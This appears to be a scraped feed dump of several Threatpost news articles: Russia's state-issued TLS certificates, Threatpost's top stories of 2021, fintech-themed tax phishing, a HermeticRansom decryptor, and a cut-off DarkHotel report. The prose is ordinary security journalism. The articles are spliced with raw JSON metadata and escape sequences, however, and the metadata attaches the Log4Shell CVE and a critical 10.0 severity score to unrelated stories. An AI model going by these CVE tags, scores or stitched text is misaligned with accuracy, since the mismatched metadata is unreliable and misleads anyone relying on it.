TLS – the successor to SSL, and often referred to as TLS/SSL – is the cryptographic protocol that encrypts data sent between your browser and the server of the website you visit. The certificates, issued by CAs that browsers trust, tie a site’s name to its public key so that the browser can verify it is talking to the genuine server; the encrypted session then keeps the data private and detects tampering, as DigiCert [explains](<https://www.digicert.com/tls-ssl/tls-ssl-certificates>).

[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/11125728/how_TLS_certificates_work-e1647021505756.jpg>)

How TLS certificates work. Source: DigiCert.

According to a [notice](<https://www.gosuslugi.ru/tls>) on Russia’s public service portal, Gosuslugi, shown in a translated version in this article’s featured art, the certificates will replace foreign security certs if they expire or get yanked by foreign CAs. According to the portal, the service is available to all legal entities operating in Russia, with the certificates delivered to site owners upon request within five working days.

## The ‘Digital Iron Curtain’

Over the past two weeks, Russia’s internet services have been cut off by multiple major U.S. internet suppliers, including [Cogent Communications](<https://www.siliconrepublic.com/comms/russia-internet-backbone-cogent-ukraine>), reportedly the second-largest internet carrier servicing Russia. Lumen, another major U.S. internet supplier, [followed suit](<https://www.washingtonpost.com/technology/2022/03/08/lumen-internet-russia-backbone-cut/>) on Tuesday, pushing the country’s citizens behind what some analysts are calling “a new digital Iron Curtain.”

Mikhail Klimarev, executive director of the [Internet Protection Society](<https://2020.internethealthreport.org/>), which advocates for digital freedoms in Russia, told [The Washington Post](<https://www.washingtonpost.com/technology/2022/03/04/russia-ukraine-internet-cogent-cutoff/>) that he’s “very afraid of this.”

“I would like to convey to people all over the world that if you turn off the Internet in Russia, then this means cutting off 140 million people from at least some truthful information. As long as the Internet exists, people can find out the truth. There will be no Internet — all people in Russia will only listen to propaganda.”

## Chrome, Firefox, Edge Won’t Swallow the New Certs

BleepingComputer reported on Thursday that the only web browsers recognizing the new CA as trustworthy at the time were the Russia-based Yandex browser and Atom products: Russian users’ only alternative to browsers such as Chrome, Firefox, Edge and others. A browser trusts only certificates that chain to a root in its trust store, so sites using the new certs will produce errors in Chrome, Firefox and Edge unless users install the Russian root themselves; a root installed that way can vouch for any domain, which is what makes the next concern possible.

Someone posting from a Mozilla email address on Thursday started a [thread](<https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/QaKxfr5hOXg>) to discuss examination of the new Russian root cert, pointing to the possibility of the Russian government using it for man-in-the-middle (MitM) [attacks](<https://bugzilla.mozilla.org/show_bug.cgi?id=1758773>) – though, they said, none had been detected as of yesterday.

“Although at present there’s no MitM, it’s likely that government websites will start using this and once adoption is high enough Russia will perhaps start MitM,” they said. They cited an ISP who said that it had been told that the new cert was mandatory, making the certificate “worth urgent consideration.”

", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-11T18:34:34", "type": "threatpost", "title": "Russia Issues Its Own TLS Certs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-11T18:34:34", "id": "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "href": "https://threatpost.com/russia-issues-its-own-tls-certs/178891/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T23:43:39", "description": "

As 2021 draws to a close, and the COVID-19
pandemic drags on, it’s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site).

While 2020 was all about work-from-home security, COVID-19-themed social engineering and gaming (all driven by social changes during Year One of the pandemic), 2021 saw a distinctive shift in interest. Data insecurity, code-repository malware, major zero-day vulnerabilities and fresh ransomware tactics dominated the most-read list – perhaps indicating that people are keenly focused on cybercrime innovation as the “new normal” for how we work becomes more settled in.

_**Jump to section:**_

 1. Data Leakapalooza
 2. Major Zero-Day Vulnerabilities
 3. Code Repository Malware
 4. Ransomware Innovations
 5. Gaming Attacks
 6. Bonus! Zodiac Killer Cipher Cracked

## **1. The Most-Read Story of 2021: Experian Leaks Everyone’s Credit Scores**

There were obviously some huge news stories that dominated headlines during the year: Log4Shell; Colonial Pipeline; Kaseya; ProxyLogon/ProxyShell; SolarWinds. But judging from article traffic, readers were most interested in…the Experian data exposure.

In April, Bill Demirkapi, a sophomore student at the Rochester Institute of Technology, discovered that the credit scores of almost every American [were exposed](<https://threatpost.com/experian-api-leaks-american-credit-scores/165731/>) through an API tool used by the Experian credit bureau, which he said was left open on a lender site without even basic security protections.

The tool, called the Experian Connect API, allows lenders to automate FICO-score queries. Demirkapi said he was able to build a command-line tool, which he named “Bill’s Cool Credit Score Lookup Utility,” that let him automate credit-score lookups for nearly anyone, even after entering all zeros in the date-of-birth fields.

In addition to raw credit scores, the college student said that he was able to use the API connection to get “risk factors” from Experian that explained potential flaws in a person’s credit history, such as “too many consumer-finance company accounts.”

Experian, for its part, fixed the problem – and refuted concerns from the security community that the issue could be systemic.

Experian wasn’t the only household name that drew in readers for data insecurity: LinkedIn data going up for sale on the Dark Web was another very hot story this year.

### **LinkedIn Data Scraping**

After 500 million LinkedIn members were affected in a data-scraping incident in April, [it happened again](<https://threatpost.com/data-700m-linkedin-users-cyber-underground/167362/>) in June. A posting with 700 million LinkedIn records for sale appeared on popular cyberattacker destination RaidForums, by a hacker calling himself “GOD User TomLiner.” The advertisement included a sample of 1 million records as “proof.”

Privacy Sharks examined the free sample and saw that the records include full names, gender, email addresses, phone numbers and industry information. It’s unclear what the origin of the data is – but the scraping of public profiles is a likely source. According to LinkedIn, no breach of its networks occurred.

Even so, researchers said the security ramifications were significant: the cache could enable brute-force cracking of account passwords, email and telephone scams, phishing attempts and identity theft, and it could be a social-engineering goldmine. 
Sure, attackers could simply visit public profiles to target someone, but having so many records in one place could make it possible to automate targeted attacks using information about users’ jobs and gender, among other details.

## **2. Major Zero-Day Bugs**

OK, this one’s a perennial topic of fascination, but 2021 had some doozies, starting with Log4Shell.

### **Log4Shell Threatens Basically All Web Servers in Existence**

The Log4Shell vulnerability is [an easily exploited flaw](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) in the ubiquitous Java logging library Apache Log4j that could allow unauthenticated remote code execution (RCE) and complete server takeover — and it’s still being actively exploited in the wild.

The flaw (CVE-2021-44228) first turned up on sites that cater to users of the world’s favorite game, Minecraft. Apache rushed a patch, but within a day or two, attacks became rampant as threat actors tried to exploit the new bug. From there, news of additional exploitation vectors, a second bug, various kinds of real-world attacks and the sheer enormity of the threat surface (the logging library is basically everywhere) dominated reader interest in December.

### **NSO Group’s Zero-Click Zero Day for Apple**

In September, a [zero-click zero-day](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) dubbed ForcedEntry by researchers was found, affecting all things Apple: iPhones, iPads, Macs and Watches. It turns out that it was being exploited by NSO Group to install the infamous Pegasus spyware.

Apple pushed out an emergency fix, but Citizen Lab had already observed NSO Group using a never-before-seen, zero-click exploit targeting iMessage to illegally spy on Bahraini activists.

The ForcedEntry exploit was particularly notable in that it was successfully deployed against the latest iOS versions – 14.4 & 14.6 – blowing past Apple’s new BlastDoor sandboxing feature to install spyware on the iPhones of the Bahraini activists.

### **Giant Zero-Day Hole in Palo Alto Security Appliances**

Another zero-day item that garnered big reader interest was [the news](<https://threatpost.com/massive-zero-day-hole-found-in-palo-alto-security-appliances/176170/>) that researchers from Randori developed a working exploit to gain remote code execution (RCE) on Palo Alto Networks’ GlobalProtect firewall, via the critical bug CVE-2021-3064.

Randori researchers said that if an attacker successfully exploits the weakness, they can gain a shell on the targeted system, access sensitive configuration data, extract credentials and more. And after that, attackers can dance across a targeted organization, they said: “Once an attacker has control over the firewall, they will have visibility into the internal network and can proceed to move laterally.”

Palo Alto Networks patched the bug on the day of disclosure.

### **The Great Google Memory Bug Zero-Day**

In March, Google [hurried out a fix](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) for a vulnerability in its Chrome browser that was under active attack. If exploited, the flaw could allow remote code-execution and denial-of-service attacks on affected systems. 
Readers flocked to the coverage of the issue.

The flaw is a use-after-free vulnerability, and specifically exists in Blink, the browser engine for Chrome developed as part of the Chromium project. Browser engines convert HTML documents and other web page resources into the visual representations viewable to end users.

“By persuading a victim to visit a specially crafted website, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial-of-service condition on the system,” according to IBM X-Force’s report on the bug.

### **Dell Kernel-Privilege Bugs**

Earlier this year, five high-severity security bugs that remained hidden for 12 years [were found](<https://threatpost.com/dell-kernel-privilege-bugs/165843/>) to exist in all Dell PCs, tablets and notebooks shipped since 2009. They allow attackers to bypass security products, execute code and pivot to other parts of the network for lateral movement, according to SentinelLabs.

The flaws lurked in Dell’s firmware update driver, impacting potentially hundreds of millions of Dell desktops, laptops, notebooks and tablets, researchers said.

The multiple local privilege-escalation (LPE) bugs exist in the firmware update driver version 2.3 (dbutil_2_3.sys) module, which has been in use since 2009. The driver component handles Dell firmware updates via the Dell BIOS Utility, and it comes pre-installed on most Dell machines running Windows.

## **3. Code Repositories and the Software Supply Chain**

The software supply chain is anchored by open-source code repositories – centralized locations where developers can upload software packages for use by other developers in building various applications, services and other projects. They include GitHub, as well as more specialized repositories like the Node.js package manager (npm) code repository for Java; RubyGems for the Ruby programming language; Python Package Index (PyPI) for Python; and others.

These package managers represent a supply-chain threat given that anyone can upload code to them, which can in turn be unwittingly used as building blocks in various applications. Any applications corrupted by malicious code can attack the programs’ users.

To boot, a single malicious package can be baked into multiple different projects – infecting them with cryptominers, info-stealers and more, and making remediation a complex process.

Cybercriminals have swarmed to this attack surface, and readers in 2021 loved to hear about their exploits.

For instance, in December, a [series of 17 malicious packages](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) in npm were found; they were all built to target Discord, the virtual meeting platform used by 350 million users that enables communication via voice calls, video calls, text messaging and files. The goal was to steal Discord tokens, which can be used to take over accounts.

Also this month, three malicious packages hosted in the PyPI code repository [were uncovered](<https://threatpost.com/malicious-pypi-code-packages/176971/>), which collectively have more than 12,000 downloads – and presumably slithered into installations in various applications. 
The packages included one trojan for establishing a backdoor on victims’ machines, and two info-stealers.

Researchers also discovered last week that there were 17,000 unpatched Log4j Java packages in the Maven Central ecosystem, leaving massive supply-chain risk on the table from [Log4Shell exploits](<https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/>). It will likely take “years” for it to be fixed across the ecosystem, [according](<https://threatpost.com/java-supply-chain-log4j-bug/177211/>) to Google’s security team.

Using malicious packages as a cyberattack vector was a common theme earlier in the year too. Here’s a rundown of other recent discoveries:

 * In January, other Discord-stealing malware [was discovered](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>) in three npm packages. One, “an0n-chat-lib,” had no legitimate “twin” package, but the other two made use of brandjacking and typosquatting to lure developers into thinking they’re legitimate. The “discord-fix” malicious component is named to be similar to the legitimate “discord-XP,” an XP framework for Discord bots. The “sonatype” package meanwhile made use of pure brandjacking.
 * In March, researchers [spotted](<https://threatpost.com/malicious-code-bombs-amazon-lyft-slack-zillow/164455/>) malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow (among others) inside the npm public code repository – all of which exfiltrated sensitive information.
 * That March attack was based on research from security researcher Alex Birsan, who found that it’s possible to [inject malicious code](<https://threatpost.com/supply-chain-hack-paypal-microsoft-apple/163814/>) into common tools for installing dependencies in developer projects. Such projects typically use public repositories from sites like GitHub. The malicious code then can use these dependencies to propagate malware through a targeted company’s internal applications and systems. The novel supply-chain attack was (ethically) used to breach the systems of more than 35 technology players, including Microsoft, Apple, PayPal, Shopify, Netflix, Tesla and Uber, by exploiting public, open-source developer tools.
 * In June, a group of cryptominers was found [to have infiltrated](<https://threatpost.com/cryptominers-python-supply-chain/167135/>) PyPI. Researchers found six different malicious packages hiding there, which had a collective 5,000 downloads.
 * In July, a credentials-stealing package that uses legitimate password-recovery tools in Google’s Chrome web browser [was found lurking in](<https://threatpost.com/npm-package-steals-chrome-passwords/168004/>) npm. Researchers caught the malware filching credentials from Chrome on Windows systems. The password-stealer is multifunctional: It also listens for incoming commands from the attacker’s command-and-control (C2) server and can upload files, record from a victim’s screen and camera, and execute shell commands.

## **4. Interesting Ransomware Variants**

The ransomware epidemic matured in 2021, with the actual malware used to lock up files progressing beyond simply slapping an extension on targeted folders. 
Readers flocked to malware analysis stories covering advancements in ransomware strains, including the following Top 3 discoveries.

### **HelloKitty’s Linux Variant Targets VMs**

In June, for the first time, researchers [publicly spotted](<https://threatpost.com/linux-variant-of-hellokitty-ransomware-targets-vmware-esxi-servers/167883/>) a Linux encryptor – being used by the HelloKitty ransomware gang.

HelloKitty, the same group behind the [February attack](<https://threatpost.com/cyberpunk-2077-publisher-hack-ransomware/163775/>) on videogame developer CD Projekt Red, has developed numerous Linux ELF-64 versions of its ransomware, which it used to target VMware ESXi servers and virtual machines (VMs) running on them.

VMware ESXi, formerly known as ESX, is a bare-metal hypervisor that installs easily onto servers and partitions them into multiple VMs. While that makes it easy for multiple VMs to share the same hard-drive storage, it sets systems up to be one-stop shopping spots for attacks, since attackers can encrypt the centralized virtual hard drives used to store data from across VMs.

Dirk Schrader of New Net Technologies (NNT) told Threatpost that on top of the attraction of ESXi servers as a target, “going that extra mile to add Linux as the origin of many virtualization platforms to [malware’s] functionality” has the welcome side effect of enabling attacks on any Linux machine.

### **MosesStaff: No Decryption Available**

A politically motivated group known as MosesStaff [was seen in November](<https://threatpost.com/mosesstaff-locks-targets-ransom-decryption/176366/>) paralyzing Israeli entities with no financial goal – and no intention of handing over decryption keys. Instead, it was using ransomware in politically motivated, destructive attacks on Israeli targets, looking to inflict the most damage possible.

MosesStaff encrypts networks and steals information, with no intention of demanding a ransom or rectifying the damage. The group also maintains an active social-media presence, pushing provocative messages and videos across its channels, and making its intentions known.

### **Epsilon Red Targets Exchange Servers**

Threat actors in June [were seen deploying](<https://threatpost.com/exchange-servers-epsilon-red-ransomware/166640/>) new ransomware on the back of a set of PowerShell scripts developed for exploiting flaws in unpatched Exchange Servers.

The Epsilon Red ransomware – a reference to an obscure enemy character in the X-Men Marvel comics, a super soldier of Russian origin armed with four mechanical tentacles – was discovered after an attack on a U.S.-based company in the hospitality sector.

Researchers said the ransomware was different in the way it spreads its hooks into a corporate network. While the malware itself is a “bare-bones” 64-bit Windows executable programmed in the Go programming language, its delivery system relies on a series of PowerShell scripts that “prepared the attacked machines for the final ransomware payload and ultimately delivered and initiated it,” they wrote.

## **5. Gaming Security**

For the second year in a row, gaming security was on the radar for readers in 2021, possibly because cybercriminals continue to target this area as a result of the global COVID-19 pandemic driving higher volumes of play. In a recent survey by Kaspersky, nearly 61 percent reported suffering foul play such as ID theft, scams or the hack of in-game valuables. 
Some of the most popular articles are recapped below.

### **Steam Used to Host Malware**

In June, the appropriately named SteamHide malware [emerged](<https://threatpost.com/steam-gaming-delivering-malware/166784/>), which disguises itself inside profile images on the gaming platform Steam.

The Steam platform merely serves as a vehicle which hosts the malicious file, according to research from G Data: “The heavy lifting in the shape of downloading, unpacking and executing a malicious payload fetched by the loader is handled by an external component, which accesses the malicious profile image on one Steam profile. This external payload can be distributed via crafted emails to compromised websites.”

The steganography technique is obviously not new — but Steam profiles being used as attacker-controlled hosting sites is – and readers’ ears perked up in a big way when we posted the story.

### **Twitch Source-Code Leak**

In October, an anonymous user posted a link to a 125GB torrent on 4chan, containing all of Twitch’s source code, comments going back to its inception, user-payout information and more.

The attacker [claimed to have ransacked](<https://threatpost.com/twitch-source-code-leaked/175359/>) the live gameplay-streaming platform for everything it’s got; Twitch confirmed the breach not long after.

The threat actor rationalized gutting the service by saying that the Twitch community needs to have the wind knocked out of its lungs. They called the leak a means to “foster more disruption and competition in the online-video streaming space,” because “their community is a disgusting toxic cesspool.”

### **Steam-Stealing Discord Scams**

In November, a scam started making the rounds on Discord, through which cybercriminals could harvest Steam account information and make off with any value the account contained.

Gamer-aimed Discord scams are just about everywhere. But researchers [flagged a new approach](<https://threatpost.com/free-discord-nitro-offer-steam-credentials/176011/>) as noteworthy because it crossed over between Discord and the Steam gaming platform, with crooks offering a purported free subscription to Nitro (a Discord add-on that enables avatars, custom emoji, profile badges, bigger uploads, server boosts and so on), in exchange for “linking” the two accounts.

The target is first served a malicious direct message on Discord with the fake offer. “Just link your Steam account and enjoy,” the message said, and it included a link purportedly to do just that. 
The malicious link takes users to a spoofed Discord page with a button that reads, “Get Nitro.” Once a victim clicks on the button, the site appears to serve a Steam pop-up ad, but researchers explained the ad is still part of the same malicious site.

The gambit is intended to fool users into thinking they’re being taken to the Steam platform to enter their login information — in reality, the crooks are poised to harvest the credentials.

### **Sony PlayStation3 Bans**

In June, a reported breach of a Sony folder containing the serial ID numbers for every PlayStation3 console out there [appeared to](<https://threatpost.com/ps3-players-ban-attacks-gaming/167303/>) have led to users being inexplicably banned from the platform.

Sony reportedly left a folder with every PS3 console ID online unsecured, and it was discovered and reported by a Spanish YouTuber with the handle “The WizWiki” in mid-April. In June, players on PlayStation Network message boards began complaining that they couldn’t sign on.

Users mused that threat actors started using the stolen PS3 console IDs for malicious purposes, causing the legitimate players to get banned. But Sony didn’t confirm a connection between the PS3 ID breach and player reports of being locked out of the platform.

## **Bonus Item: Zodiac Killer Cipher – Revealed!!**

One of the quirky stories that made it into the Top 10 most-read Threatpost stories for 2021 concerned the cracking of the Zodiac serial killer’s 340 cipher, which couldn’t be solved for 50 years. In December 2020, the code [was cracked](<https://threatpost.com/cryptologists-zodiac-killer-340-cipher/162353/>) by a team of mathematicians.

The Zodiac serial killer is believed to have murdered at least five people — and likely more — in and around the Northern California area in the late 1960s and early 1970s. The still-unnamed murderer sent a series of four coded messages to local newspaper outlets, bragging about his crimes and containing cryptic icons, which earned him the moniker “Zodiac.”

The first cipher was quickly decoded. But the second, the 340 Cipher, named after its 340 characters, was trickier to figure out. Australian-based mathematician Sam Blake calculated that there were 650,000 possible ways to read the code, and Jarl Van Eycke, whose day job is as a warehouse operator in Belgium, wrote code-breaking software to tackle decryption. Soon, their unique algorithmic approach paid off. The message, officially recognized by the FBI as correct, reads:

“I HOPE YOU ARE HAVING LOTS OF FUN IN TRYING TO CATCH ME THAT WASNT ME ON THE TV SHOW WHICH BRINGS UP A POINT ABOUT ME I AM NOT AFRAID OF THE GAS CHAMBER BECAUSE IT WILL SEND ME TO PARADICE ALL THE SOONER BECAUSE I NOW HAVE ENOUGH SLAVES TO WORK FOR ME WHERE EVERYONE ELSE HAS NOTHING WHEN THEY REACH PARADICE SO THEY ARE AFRAID OF DEATH I AM NOT AFRAID BECAUSE I KNOW THAT MY NEW LIFE IS LIFE WILL BE AN EASY ONE IN PARADICE DEATH.”

While the name of the elusive serial killer remains hidden, the breakthrough represents a triumph for cryptology and the basic building blocks of cybersecurity — access control and segmentation.

**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_– unique, dynamic discussions with cybersecurity experts and the Threatpost community._**

Source: Threatpost, “The 5 Most-Wanted Threatpost Stories of 2021,” published 2021-12-27T18:57:24, https://threatpost.com/5-top-threatpost-stories-2021/177278/ (record id THREATPOST:8FFF44C70736D8E21796B9337E52F29D).

Threat actors have new targets in their sights this tax season during the annual barrage of cyber-scams as people file their U.S. income-tax documents. Novel email campaigns are spoofing popular financial technology (fintech) applications and their tax notifications to try to dupe victims into giving up their credentials, researchers have found.

It’s common for attackers to target popular tax filing and preparation apps such as [Intuit](<https://threatpost.com/attackers-intuit-cancel-tax-accounts/178219/>) and TurboTax in various cybercriminal campaigns during tax season, a time that’s traditionally rife with scams. 
In 2020, for example, threat actors [targeted small tax-preparation](<https://threatpost.com/latest-tax-scam-target-apps-and-tax-prep-websites/152998/>) firms by planting malicious code on their websites to spread malware to site users.

This year, attackers have pivoted to take on the personas of fintech apps like [Stash](<https://www.stash.com/>) and [Public](<https://public.com/>) “to steal credentials and give users a false sense of security that they’ve compiled the right tax documents,” according to [a report](<https://www.avanan.com/blog/hackers-begin-spoofing-fintech-apps-as-tax-season-approaches>) published Thursday by Avanan, a Check Point company.

In scams observed by Avanan researchers beginning in February, attackers spoof the logo and look and feel of communication that Stash and Public might send to end users to inform them that their tax document is ready, Jeremy Fuchs, Avanan cybersecurity researcher and analyst, wrote in the report.

The email includes a link to a document – purportedly associated with the person’s Stash or Public account – and invites users to use the link to log in to their accounts to access it. When the user clicks on the link, however, they are directed not to a legitimate log-in site, but to one that harvests their credentials, Fuchs said.

## **Rise in Fintech Threats**

Fintech is a growing attack surface for threat actors due to the sheer increase in its user base in the last couple of years, primarily attributed by researchers to the pandemic-related increase in people’s overall time online.

According to [a study](<https://plaid.com/blog/report-the-fintech-effect-2021/>) by fintech startup Plaid, 88 percent of people in the United States were using some form of fintech by late 2021 – a rise of 52 percent from the 58 percent of people who reported using fintech in 2020.

Surprisingly, that’s more than the number of people in the United States who use streaming services or social media, making fintech an attractive target for threat actors, Fuchs wrote. “That gives hackers a wide range of people to steal credentials from,” he said.

Threat actors began an early foray into targeting fintech users during tax season by targeting online investment service Robinhood [last April](<https://threatpost.com/robinhood-warns-customers-of-tax-season-phishing-scams/165180/>) in a similar way to this year’s campaigns spoofing Stash and Public. At the time, researchers discovered an attack vector that used phishing emails with links to fake Robinhood websites prompting visitors to enter their login credentials.

## **Catching Users Off Guard**

Fintech companies are also an attractive target because these types of scams can catch users by surprise, Fuchs noted.

“They may not be expecting tax documents from these apps, inducing them to click,” he wrote in the report. “Since most of these services are mobile-first, users may receive this on their phone and may forget about typical cyber hygiene.”

On the contrary, people should be at their most diligent when receiving any emails regarding tax forms or services, given that clicking on the wrong link, especially while connected to a corporate network, can have dire consequences, Fuchs said.

To keep networks safe during tax season, Avanan is advising security professionals to encourage end-users to check URLs before clicking on tax-related emails, as well as to ask users to log in directly to the financial institution when receiving tax-notification emails while at work. They also suggest security admins urge end-users to reach out to the company’s IT department if they are unsure whether an email is legitimate.

Source: Threatpost, “Tax-Season Scammers Spoof Fintechs, Including Stash, Public,” published 2022-03-24T13:00:16, https://threatpost.com/tax-season-scammers-spoof-fintechs-stash-public/179071/ (record id THREATPOST:4B8076F30D5D67336733D7FFBCBD929A).

A free decryptor is out to unlock a ransomware found piggybacking on the HermeticWiper data wiper malware that [ESET](<https://twitter.com/ESETresearch/status/1496581903205511181>) and Broadcom’s [Symantec](<https://twitter.com/threatintel/status/1496578746014437376>) discovered targeting machines at financial, defense, aviation and IT services outfits in Ukraine, [Lithuania](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia>) and Latvia last week.

The fact that there was ransomware clinging to the data-wiping malware didn’t surprise cybersecurity experts, of course. It was predicted by Katie Nickels, director of intel at Red Canary, for one: She [tweeted](<https://twitter.com/likethecoins/status/1496590297228357634?cxt=HBwWhMC9ica8-sQpAAAA&cn=ZmxleGlibGVfcmVjcw%3D%3D&refsrc=email>) that there was very likely a “broader intrusion chain.”

> As you're reading this, note this point: adversaries likely had control of the AD server already. They were already in. There's a broader intrusion chain beyond just the wiper, it just isn't publicly known yet. I'm watching for any details on what happens BEFORE wiper deployment. 
<https://t.co/59SZTpTlXA>\n> \n> \u2014 Katie Nickels (@likethecoins) [February 23, 2022](<https://twitter.com/likethecoins/status/1496590297228357634?ref_src=twsrc%5Etfw>)\n\nWhat might have been a bit more surprising was the welcome [discovery](<https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/>), made by CrowdStrike\u2019s Intelligence Team earlier this week, that HermeticRansom had a lame encryption process that let the ransomware\u2019s tentacles be untangled.\n\nAvast Threat Labs had [spotted](<https://twitter.com/AvastThreatLabs/status/1496663206634344449>) the new ransomware strain last Thursday, Feb. 24. Avast, which named the new strain HermeticRansom, on Thursday [released](<https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/>) a free decryptor that incorporated a decryption [script](<https://github.com/CrowdStrike/PartyTicketDecryptor>) CrowdStrike released to GitHub, a user-friendly GUI and a set of instructions on its use.\n\nThe decryptor can be downloaded [here](<https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/#howto>).\n\n## Crypto Likely Weakened by Coding Errors\n\nHermeticRansom, aka PartyTicket, was [identified](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia>) at several victimized organizations, among other malware families that included what CrowdStrike called the \u201csophisticated\u201d HermeticWiper, aka DriveSlayer.\n\nRegardless of how sophisticated the wiper malware was, the ransomware that hopped a ride on it had less-than-stellar encryption, with a logic flaw in the encryption process that enabled researchers to break through, CrowdStrike said: \u201cAnalysis of the [PartyTicket/HermeticRansom] ransomware indicates it superficially encrypts files and does not properly initialize the encryption key, making the encrypted file with the 
associated .encryptedJB extension recoverable.\u201d\n\nAt the time it published its report, CrowdStrike hadn\u2019t traced the ransomware to a known threat actor. It didn\u2019t quite seem like a serious attempt at ransomware, at any rate, researchers said, given the coding errors that made its encryption \u201cbreakable and slow.\u201d\n\nEither the malware author was unfamiliar with writing in Go or rushed its development without thoroughly testing it, analysts surmised.\n\nEither way, it looked to analysts as if extortion wasn\u2019t the primary aim: \u201cThe relative immaturity and political messaging of the ransomware, the deployment timing and the targeting of Ukrainian entities are consistent with its use as an additional payload alongside DriveSlayer activity, rather than as a legitimate ransomware extortion attempt,\u201d they wrote.\n\nBelow is a screen capture of HermeticRansom\u2019s extortion note:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04105632/HermeticRansom-Ransom-note-e1646409408416.png>)\n\nHermeticRansom ransomware demand note. Source: CrowdStrike Intelligence Team.\n\n## HermeticWiper History\n\n[**HermeticWiper**](<https://twitter.com/juanandres_gs/status/1496581710368358400>), discovered last week, has been used against hundreds of machines in Ukraine \u2013 attacks that followed distributed denial-of-service (DDoS) attacks launched against Ukraine websites on Feb. 23.\n\nOne of the HermeticWiper malware samples was compiled back on Dec. 
28, pointing to the wiper attacks having been [readied](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) two months before Russia\u2019s military assault.\n\nHermeticWiper was only one of an onslaught of cyberattacks and malware that have been unleashed prior to and during the crisis, including the novel FoxBlade [trojan](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>), a [wave](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) of pre-invasion DDoS attacks in mid-February, plus another [campaign](<https://threatpost.com/destructive-wiper-ukraine/177768/>) of wiper attacks targeting Ukraine and aimed at eroding trust in January \u2013 just a few of an ongoing barrage of cyberattacks in the [cyber warzone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. 
[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T16:56:27", "type": "threatpost", "title": "Free HermeticRansom Ransomware Decryptor Released", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-04T16:56:27", "id": "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "href": "https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T18:54:13", "description": "An advanced persistent threat (APT) group has been targeting luxury hotels in Macao, China with a spear-phishing campaign aimed at breaching their networks and stealing the sensitive data of high-profile guests staying at resorts, including the Grand Coloane Resort and Wynn Palace.\n\nA threat research report from Trellix \u201ccautiously\u201d identified the South Korean [DarkHotel APT 
